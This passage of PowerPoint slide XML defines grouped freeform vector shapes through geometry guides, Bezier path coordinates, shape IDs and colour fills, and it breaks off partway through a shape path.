                <a:chExt cx="430" cy="412"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2134" name="Freeform 1360">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC49832-1277-457C-9508-ADC63E3263E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733" y="778"/>
                  <a:ext cx="430" cy="412"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1342"/>
                    <a:gd name="T1" fmla="*/ 361 h 1285"/>
                    <a:gd name="T2" fmla="*/ 0 w 1342"/>
                    <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                    <a:gd name="T4" fmla="*/ 1342 w 1342"/>
                    <a:gd name="T5" fmla="*/ 923 h 1285"/>
                    <a:gd name="T6" fmla="*/ 1342 w 1342"/>
                    <a:gd name="T7" fmla="*/ 0 h 1285"/>
                    <a:gd name="T8" fmla="*/ 0 w 1342"/>
                    <a:gd name="T9" fmla="*/ 361 h 1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2" h="1285">
                      <a:moveTo>
                        <a:pt x="0" y="361"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1342" y="923"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36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35" name="Group 1361">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C072469-B2C3-4EA3-9040-3F4823EE23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86" y="843"/>
                  <a:ext cx="329" cy="240"/>
                  <a:chOff x="786" y="843"/>
                  <a:chExt cx="329" cy="240"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2136" name="Group 1362">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A564E3C-3787-4571-9EE5-AC22A165D78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57" y="843"/>
                    <a:ext cx="158" cy="240"/>
                    <a:chOff x="953" y="846"/>
                    <a:chExt cx="166" cy="239"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2140" name="Freeform 1363">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DCAEDE8-D165-430A-BCA0-B1C59E6D46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953" y="933"/>
                      <a:ext cx="166" cy="152"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 218 w 219"/>
                        <a:gd name="T1" fmla="*/ 14 h 200"/>
                        <a:gd name="T2" fmla="*/ 201 w 219"/>
                        <a:gd name="T3" fmla="*/ 2 h 200"/>
                        <a:gd name="T4" fmla="*/ 15 w 219"/>
                        <a:gd name="T5" fmla="*/ 52 h 200"/>
                        <a:gd name="T6" fmla="*/ 0 w 219"/>
                        <a:gd name="T7" fmla="*/ 73 h 200"/>
                        <a:gd name="T8" fmla="*/ 1 w 219"/>
                        <a:gd name="T9" fmla="*/ 186 h 200"/>
                        <a:gd name="T10" fmla="*/ 17 w 219"/>
                        <a:gd name="T11" fmla="*/ 198 h 200"/>
                        <a:gd name="T12" fmla="*/ 202 w 219"/>
                        <a:gd name="T13" fmla="*/ 148 h 200"/>
                        <a:gd name="T14" fmla="*/ 219 w 219"/>
                        <a:gd name="T15" fmla="*/ 127 h 200"/>
                        <a:gd name="T16" fmla="*/ 218 w 219"/>
                        <a:gd name="T17" fmla="*/ 14 h 2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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="219" h="200">
                          <a:moveTo>
                            <a:pt x="218" y="14"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="218" y="5"/>
                            <a:pt x="210" y="0"/>
                            <a:pt x="201" y="2"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="15" y="52"/>
                            <a:pt x="15" y="52"/>
                            <a:pt x="15" y="52"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="7" y="54"/>
                            <a:pt x="0" y="64"/>
                            <a:pt x="0" y="73"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="186"/>
                            <a:pt x="1" y="186"/>
                            <a:pt x="1" y="186"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="195"/>
                            <a:pt x="8" y="200"/>
                            <a:pt x="17" y="198"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="202" y="148"/>
                            <a:pt x="202" y="148"/>
                            <a:pt x="202" y="148"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="212" y="146"/>
                            <a:pt x="219" y="136"/>
                            <a:pt x="219" y="127"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="219" y="94"/>
                            <a:pt x="218" y="14"/>
                            <a:pt x="218" y="1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6350" cmpd="sng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41" name="Freeform 1364">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04EA38BA-412D-4A20-BF8C-B5069BC0077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984" y="846"/>
                      <a:ext cx="101" cy="102"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 68 w 133"/>
                        <a:gd name="T1" fmla="*/ 125 h 135"/>
                        <a:gd name="T2" fmla="*/ 133 w 133"/>
                        <a:gd name="T3" fmla="*/ 49 h 135"/>
                        <a:gd name="T4" fmla="*/ 67 w 133"/>
                        <a:gd name="T5" fmla="*/ 9 h 135"/>
                        <a:gd name="T6" fmla="*/ 0 w 133"/>
                        <a:gd name="T7" fmla="*/ 85 h 135"/>
                        <a:gd name="T8" fmla="*/ 68 w 133"/>
                        <a:gd name="T9" fmla="*/ 125 h 1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33" h="135">
                          <a:moveTo>
                            <a:pt x="68" y="125"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="104" y="115"/>
                            <a:pt x="133" y="81"/>
                            <a:pt x="133" y="49"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="133" y="17"/>
                            <a:pt x="103" y="0"/>
                            <a:pt x="67" y="9"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="30" y="19"/>
                            <a:pt x="0" y="53"/>
                            <a:pt x="0" y="85"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="117"/>
                            <a:pt x="31" y="135"/>
                            <a:pt x="68" y="125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6350" cmpd="sng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2137" name="Freeform 1365">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0967208-2B6D-44E9-8286-9772ADC3DD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786" y="931"/>
                    <a:ext cx="123" cy="52"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 385"/>
                      <a:gd name="T1" fmla="*/ 163 h 163"/>
                      <a:gd name="T2" fmla="*/ 0 w 385"/>
                      <a:gd name="T3" fmla="*/ 101 h 163"/>
                      <a:gd name="T4" fmla="*/ 385 w 385"/>
                      <a:gd name="T5" fmla="*/ 0 h 163"/>
                      <a:gd name="T6" fmla="*/ 385 w 385"/>
                      <a:gd name="T7" fmla="*/ 61 h 163"/>
                      <a:gd name="T8" fmla="*/ 0 w 385"/>
                      <a:gd name="T9" fmla="*/ 163 h 1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5" h="163">
                        <a:moveTo>
                          <a:pt x="0" y="163"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="101"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="385" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="385" y="61"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1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1B171B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38" name="Freeform 1366">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6706F860-0548-439B-A2EC-E336FB5A7D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786" y="969"/>
                    <a:ext cx="123" cy="53"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 385"/>
                      <a:gd name="T1" fmla="*/ 163 h 163"/>
                      <a:gd name="T2" fmla="*/ 0 w 385"/>
                      <a:gd name="T3" fmla="*/ 102 h 163"/>
                      <a:gd name="T4" fmla="*/ 385 w 385"/>
                      <a:gd name="T5" fmla="*/ 0 h 163"/>
                      <a:gd name="T6" fmla="*/ 385 w 385"/>
                      <a:gd name="T7" fmla="*/ 62 h 163"/>
                      <a:gd name="T8" fmla="*/ 0 w 385"/>
                      <a:gd name="T9" fmla="*/ 163 h 1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5" h="163">
                        <a:moveTo>
                          <a:pt x="0" y="163"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="102"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="385" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="385" y="62"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1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1B171B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39" name="Freeform 1367">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47570DDA-5AFB-44F7-ACFB-E2527878D9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786" y="1008"/>
                    <a:ext cx="123" cy="53"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 385"/>
                      <a:gd name="T1" fmla="*/ 163 h 163"/>
                      <a:gd name="T2" fmla="*/ 0 w 385"/>
                      <a:gd name="T3" fmla="*/ 101 h 163"/>
                      <a:gd name="T4" fmla="*/ 385 w 385"/>
                      <a:gd name="T5" fmla="*/ 0 h 163"/>
                      <a:gd name="T6" fmla="*/ 385 w 385"/>
                      <a:gd name="T7" fmla="*/ 61 h 163"/>
                      <a:gd name="T8" fmla="*/ 0 w 385"/>
                      <a:gd name="T9" fmla="*/ 163 h 1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5" h="163">
                        <a:moveTo>
                          <a:pt x="0" y="163"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="101"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="385" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="385" y="61"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1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1B171B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099" name="Group 1472">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9984EABD-541B-40C2-9D72-1AE9D87FBA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24250" y="3844925"/>
                <a:ext cx="731838" cy="542925"/>
                <a:chOff x="2220" y="2422"/>
                <a:chExt cx="461" cy="342"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="2100" name="Group 1229">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C4BBC20-980D-4A5C-A7A2-BE4B377B3DA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82" y="2435"/>
                  <a:ext cx="154" cy="264"/>
                  <a:chOff x="1971" y="1822"/>
                  <a:chExt cx="154" cy="264"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2128" name="Freeform 1118">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{102F8BEF-2EB6-4BF4-9029-4A0578231566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gray">
                  <a:xfrm>
                    <a:off x="1971" y="1865"/>
                    <a:ext cx="154" cy="122"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 235 w 237"/>
                      <a:gd name="T1" fmla="*/ 113 h 186"/>
                      <a:gd name="T2" fmla="*/ 235 w 237"/>
                      <a:gd name="T3" fmla="*/ 113 h 186"/>
                      <a:gd name="T4" fmla="*/ 225 w 237"/>
                      <a:gd name="T5" fmla="*/ 49 h 186"/>
                      <a:gd name="T6" fmla="*/ 199 w 237"/>
                      <a:gd name="T7" fmla="*/ 24 h 186"/>
                      <a:gd name="T8" fmla="*/ 156 w 237"/>
                      <a:gd name="T9" fmla="*/ 12 h 186"/>
                      <a:gd name="T10" fmla="*/ 116 w 237"/>
                      <a:gd name="T11" fmla="*/ 2 h 186"/>
                      <a:gd name="T12" fmla="*/ 87 w 237"/>
                      <a:gd name="T13" fmla="*/ 12 h 186"/>
                      <a:gd name="T14" fmla="*/ 73 w 237"/>
                      <a:gd name="T15" fmla="*/ 85 h 186"/>
                      <a:gd name="T16" fmla="*/ 73 w 237"/>
                      <a:gd name="T17" fmla="*/ 85 h 186"/>
                      <a:gd name="T18" fmla="*/ 72 w 237"/>
                      <a:gd name="T19" fmla="*/ 90 h 186"/>
                      <a:gd name="T20" fmla="*/ 21 w 237"/>
                      <a:gd name="T21" fmla="*/ 104 h 186"/>
                      <a:gd name="T22" fmla="*/ 26 w 237"/>
                      <a:gd name="T23" fmla="*/ 135 h 186"/>
                      <a:gd name="T24" fmla="*/ 80 w 237"/>
                      <a:gd name="T25" fmla="*/ 122 h 186"/>
                      <a:gd name="T26" fmla="*/ 80 w 237"/>
                      <a:gd name="T27" fmla="*/ 122 h 186"/>
                      <a:gd name="T28" fmla="*/ 86 w 237"/>
                      <a:gd name="T29" fmla="*/ 120 h 186"/>
                      <a:gd name="T30" fmla="*/ 99 w 237"/>
                      <a:gd name="T31" fmla="*/ 112 h 186"/>
                      <a:gd name="T32" fmla="*/ 104 w 237"/>
                      <a:gd name="T33" fmla="*/ 92 h 186"/>
                      <a:gd name="T34" fmla="*/ 104 w 237"/>
                      <a:gd name="T35" fmla="*/ 92 h 186"/>
                      <a:gd name="T36" fmla="*/ 110 w 237"/>
                      <a:gd name="T37" fmla="*/ 47 h 186"/>
                      <a:gd name="T38" fmla="*/ 109 w 237"/>
                      <a:gd name="T39" fmla="*/ 160 h 186"/>
                      <a:gd name="T40" fmla="*/ 119 w 237"/>
                      <a:gd name="T41" fmla="*/ 170 h 186"/>
                      <a:gd name="T42" fmla="*/ 169 w 237"/>
                      <a:gd name="T43" fmla="*/ 184 h 186"/>
                      <a:gd name="T44" fmla="*/ 196 w 237"/>
                      <a:gd name="T45" fmla="*/ 165 h 186"/>
                      <a:gd name="T46" fmla="*/ 196 w 237"/>
                      <a:gd name="T47" fmla="*/ 160 h 186"/>
                      <a:gd name="T48" fmla="*/ 216 w 237"/>
                      <a:gd name="T49" fmla="*/ 155 h 186"/>
                      <a:gd name="T50" fmla="*/ 219 w 237"/>
                      <a:gd name="T51" fmla="*/ 154 h 186"/>
                      <a:gd name="T52" fmla="*/ 232 w 237"/>
                      <a:gd name="T53" fmla="*/ 146 h 186"/>
                      <a:gd name="T54" fmla="*/ 237 w 237"/>
                      <a:gd name="T55" fmla="*/ 124 h 186"/>
                      <a:gd name="T56" fmla="*/ 235 w 237"/>
                      <a:gd name="T57" fmla="*/ 113 h 186"/>
                      <a:gd name="T58" fmla="*/ 193 w 237"/>
                      <a:gd name="T59" fmla="*/ 75 h 186"/>
                      <a:gd name="T60" fmla="*/ 194 w 237"/>
                      <a:gd name="T61" fmla="*/ 87 h 186"/>
                      <a:gd name="T62" fmla="*/ 200 w 237"/>
                      <a:gd name="T63" fmla="*/ 123 h 186"/>
                      <a:gd name="T64" fmla="*/ 196 w 237"/>
                      <a:gd name="T65" fmla="*/ 124 h 186"/>
                      <a:gd name="T66" fmla="*/ 194 w 237"/>
                      <a:gd name="T67" fmla="*/ 87 h 186"/>
                      <a:gd name="T68" fmla="*/ 193 w 237"/>
                      <a:gd name="T69" fmla="*/ 75 h 186"/>
                      <a:gd name="T70" fmla="*/ 192 w 237"/>
                      <a:gd name="T71" fmla="*/ 70 h 186"/>
                      <a:gd name="T72" fmla="*/ 193 w 237"/>
                      <a:gd name="T73" fmla="*/ 75 h 1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37" h="186">
                        <a:moveTo>
                          <a:pt x="235" y="113"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="230" y="84"/>
                          <a:pt x="226" y="57"/>
                          <a:pt x="225" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="223" y="32"/>
                          <a:pt x="207" y="26"/>
                          <a:pt x="199" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="21"/>
                          <a:pt x="169" y="16"/>
                          <a:pt x="156" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="9"/>
                          <a:pt x="125" y="3"/>
                          <a:pt x="116" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="0"/>
                          <a:pt x="90" y="4"/>
                          <a:pt x="87" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="14"/>
                          <a:pt x="79" y="50"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="96"/>
                          <a:pt x="29" y="102"/>
                          <a:pt x="21" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="108"/>
                          <a:pt x="9" y="137"/>
                          <a:pt x="26" y="135"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="135"/>
                          <a:pt x="55" y="129"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="118"/>
                          <a:pt x="96" y="116"/>
                          <a:pt x="99" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="102" y="108"/>
                          <a:pt x="104" y="102"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="65"/>
                          <a:pt x="111" y="43"/>
                          <a:pt x="110" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="53"/>
                          <a:pt x="109" y="117"/>
                          <a:pt x="109" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="165"/>
                          <a:pt x="112" y="170"/>
                          <a:pt x="119" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="131" y="173"/>
                          <a:pt x="162" y="183"/>
                          <a:pt x="169" y="184"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="178" y="186"/>
                          <a:pt x="193" y="176"/>
                          <a:pt x="196" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="163"/>
                          <a:pt x="196" y="162"/>
                          <a:pt x="196" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="202" y="158"/>
                          <a:pt x="209" y="157"/>
                          <a:pt x="216" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="217" y="154"/>
                          <a:pt x="218" y="154"/>
                          <a:pt x="219" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="225" y="152"/>
                          <a:pt x="229" y="150"/>
                          <a:pt x="232" y="146"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="141"/>
                          <a:pt x="237" y="135"/>
                          <a:pt x="237" y="124"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="235" y="113"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="193" y="75"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="79"/>
                          <a:pt x="194" y="83"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="96"/>
                          <a:pt x="198" y="108"/>
                          <a:pt x="200" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="199" y="123"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="196" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="111"/>
                          <a:pt x="195" y="99"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="82"/>
                          <a:pt x="193" y="78"/>
                          <a:pt x="193" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="73"/>
                          <a:pt x="192" y="72"/>
                          <a:pt x="192" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="72"/>
                          <a:pt x="193" y="73"/>
                          <a:pt x="193" y="75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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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9" name="Freeform 1119">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C83DD98E-D0EF-4604-8B22-41908A6AE4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048" y="1857"/>
                    <a:ext cx="42" cy="27"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="15"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="19" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="48" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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30" name="Freeform 1120">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A7D22D5-59CF-4CE4-8E2D-750963983E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995" y="1968"/>
                    <a:ext cx="103" cy="118"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 159 w 159"/>
                      <a:gd name="T1" fmla="*/ 6 h 180"/>
                      <a:gd name="T2" fmla="*/ 132 w 159"/>
                      <a:gd name="T3" fmla="*/ 21 h 180"/>
                      <a:gd name="T4" fmla="*/ 81 w 159"/>
                      <a:gd name="T5" fmla="*/ 11 h 180"/>
                      <a:gd name="T6" fmla="*/ 72 w 159"/>
                      <a:gd name="T7" fmla="*/ 0 h 180"/>
                      <a:gd name="T8" fmla="*/ 68 w 159"/>
                      <a:gd name="T9" fmla="*/ 19 h 180"/>
                      <a:gd name="T10" fmla="*/ 17 w 159"/>
                      <a:gd name="T11" fmla="*/ 32 h 180"/>
                      <a:gd name="T12" fmla="*/ 1 w 159"/>
                      <a:gd name="T13" fmla="*/ 55 h 180"/>
                      <a:gd name="T14" fmla="*/ 1 w 159"/>
                      <a:gd name="T15" fmla="*/ 145 h 180"/>
                      <a:gd name="T16" fmla="*/ 36 w 159"/>
                      <a:gd name="T17" fmla="*/ 156 h 180"/>
                      <a:gd name="T18" fmla="*/ 43 w 159"/>
                      <a:gd name="T19" fmla="*/ 145 h 180"/>
                      <a:gd name="T20" fmla="*/ 42 w 159"/>
                      <a:gd name="T21" fmla="*/ 73 h 180"/>
                      <a:gd name="T22" fmla="*/ 42 w 159"/>
                      <a:gd name="T23" fmla="*/ 73 h 180"/>
                      <a:gd name="T24" fmla="*/ 42 w 159"/>
                      <a:gd name="T25" fmla="*/ 72 h 180"/>
                      <a:gd name="T26" fmla="*/ 42 w 159"/>
                      <a:gd name="T27" fmla="*/ 66 h 180"/>
                      <a:gd name="T28" fmla="*/ 42 w 159"/>
                      <a:gd name="T29" fmla="*/ 64 h 180"/>
                      <a:gd name="T30" fmla="*/ 42 w 159"/>
                      <a:gd name="T31" fmla="*/ 63 h 180"/>
                      <a:gd name="T32" fmla="*/ 59 w 159"/>
                      <a:gd name="T33" fmla="*/ 41 h 180"/>
                      <a:gd name="T34" fmla="*/ 103 w 159"/>
                      <a:gd name="T35" fmla="*/ 30 h 180"/>
                      <a:gd name="T36" fmla="*/ 103 w 159"/>
                      <a:gd name="T37" fmla="*/ 30 h 180"/>
                      <a:gd name="T38" fmla="*/ 59 w 159"/>
                      <a:gd name="T39" fmla="*/ 41 h 180"/>
                      <a:gd name="T40" fmla="*/ 42 w 159"/>
                      <a:gd name="T41" fmla="*/ 63 h 180"/>
                      <a:gd name="T42" fmla="*/ 42 w 159"/>
                      <a:gd name="T43" fmla="*/ 71 h 180"/>
                      <a:gd name="T44" fmla="*/ 42 w 159"/>
                      <a:gd name="T45" fmla="*/ 72 h 180"/>
                      <a:gd name="T46" fmla="*/ 42 w 159"/>
                      <a:gd name="T47" fmla="*/ 77 h 180"/>
                      <a:gd name="T48" fmla="*/ 42 w 159"/>
                      <a:gd name="T49" fmla="*/ 77 h 180"/>
                      <a:gd name="T50" fmla="*/ 43 w 159"/>
                      <a:gd name="T51" fmla="*/ 154 h 180"/>
                      <a:gd name="T52" fmla="*/ 43 w 159"/>
                      <a:gd name="T53" fmla="*/ 154 h 180"/>
                      <a:gd name="T54" fmla="*/ 43 w 159"/>
                      <a:gd name="T55" fmla="*/ 157 h 180"/>
                      <a:gd name="T56" fmla="*/ 84 w 159"/>
                      <a:gd name="T57" fmla="*/ 157 h 180"/>
                      <a:gd name="T58" fmla="*/ 85 w 159"/>
                      <a:gd name="T59" fmla="*/ 77 h 180"/>
                      <a:gd name="T60" fmla="*/ 89 w 159"/>
                      <a:gd name="T61" fmla="*/ 69 h 180"/>
                      <a:gd name="T62" fmla="*/ 141 w 159"/>
                      <a:gd name="T63" fmla="*/ 55 h 180"/>
                      <a:gd name="T64" fmla="*/ 159 w 159"/>
                      <a:gd name="T65" fmla="*/ 25 h 180"/>
                      <a:gd name="T66" fmla="*/ 159 w 159"/>
                      <a:gd name="T67" fmla="*/ 8 h 180"/>
                      <a:gd name="T68" fmla="*/ 159 w 159"/>
                      <a:gd name="T69" fmla="*/ 6 h 1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9" h="180">
                        <a:moveTo>
                          <a:pt x="159" y="6"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="156" y="17"/>
                          <a:pt x="140" y="23"/>
                          <a:pt x="132" y="21"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
